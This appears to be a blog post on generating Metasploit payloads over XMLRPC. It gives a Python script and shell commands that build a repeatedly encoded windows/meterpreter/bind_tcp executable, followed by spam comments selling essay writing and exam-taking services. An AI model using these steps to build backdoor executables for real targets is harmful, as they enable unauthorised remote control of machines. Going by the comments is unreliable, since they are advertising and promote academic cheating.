I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.
import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")
ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"
opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}
ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])
Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:
[email protected]:~/msfmods/py# time (python get_payload.py > /tmp/test3)
real 0m3.839s
user 0m0.020s
sys 0m0.043s
[email protected]:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )
real 0m10.548s
user 0m7.553s
sys 0m2.920s
[email protected]:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
Have thoughts or suggestions ?
Hit me up at sussurro [aT] happypacket DOT net
12 comments:
it awesome artical.i found it so educational.
I think, my friend has shared this post by mistake because I asked him to find someone who can Do My Dissertation Uk
format and I do not know why he has shared this post with me but I must say, you have posted very nice information which can be beneficial for many students.
My last week was spent learning how to generate payloads inside Metasploit, but still, I had some questions, and I was looking for their answers. After reading your blog, I identified an error that caused me to fail. British Writings
Being a blog writer is tough you have to be genuine about everything because your fans believe you blindly. This is a lot of pressure. I follow a blogger and she posts reviews about academic online services. I recently took this Marketing thesis help on her recommendation and believe me it turned out to be the best decision. Your authenticity is what gets you, followers!
it awesome artical.i found it so educational. and every ones know that your writing style its adorable i am designer i have best collection of shearling leather jackets for men in USA
Leather Jackets for men are a great way to add a touch of style to your look and they can also keep you warm in cooler weather.
it awesome artical.i found it so educational. and every ones know that your writing style its adorable by the way i am agent in save driver company we provide best dubai safe driver.
I think it's a great idea! I would love to be able to pay for grades in online class. It would incentive me to do my best and get good grades.
I think it's a fantastic plan! I love reading your article keep up with the good work. It is such an amazing blog. Take my hesi exam for me
I found your post on "Fun with Metasploit payload generation" quite interesting. However, as a healthcare enthusiast, I would like to suggest that your readers check out Meri Sehat.pk - an online healthcare services provider that offers a variety of services, including an online BP check app. This app is very helpful for people who want to monitor their blood pressure at home and keep track of their health. It's always great to see technology being used for the betterment of our health, and I believe Meri Sehat.pk is doing a fantastic job in that regard.
I have read your post but I can't understand to your post, I was busy with cheap dissertation writing services
Post a Comment